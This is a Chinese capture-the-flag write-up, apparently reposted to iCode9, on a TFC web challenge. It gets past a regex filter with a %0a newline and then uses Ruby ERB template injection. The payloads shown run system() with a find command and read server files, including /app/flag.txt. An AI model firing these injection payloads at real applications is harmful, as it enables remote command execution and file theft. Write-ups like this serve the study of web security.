标签：WEB 读取 WriteUp TFC flag 0a input find 模板

题目信息

看题目就是考察如何绕过filter。

探索

具体页面，输入字符提交后进行回显，用Burp跑常见的ascii特殊字符可以发现都被过滤了。

试了一下%df发现有报错信息：

报错信息展开后可以看到网站具体使用的技术栈，ERB类似于python的jinja2之类的，网上能找到存在模板注入的问题参考，所以接下来的方向就是构造模板注入的参数，通过回显来找flag。

开搞

• 正则绕过：
  通过%0a(即换行符)隔开正常文本和我们要执行的模板注入信息，正则匹配默认是不换行检测的。
• 模板注入：ERB的模板格式为<%= code %>，写在url里需要对%进行URL编码，在Burp中需要把空格改为+号。模板内的代码要做的事：找flag文件，读取内容(Ruby的system()返回结果为是否执行成功，为图方便写成了多个命令的形式)

# 查找flag文件 find / -name *flag* >1.txt
input=111%0a<%25=+system('find+/+-name+*flag*+>1.txt')+%25>
# 读取find搜索结果
input=111%0a<%25=File.read("1.txt").split%25>
# 读取flag内容
input=111%0a<%25=File.read("/app/flag.txt").split%25>

读取find结果：

拿flag

标签：WEB,读取,WriteUp,TFC,flag,0a,input,find,模板
来源： https://www.cnblogs.com/sukinoaria/p/16536631.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。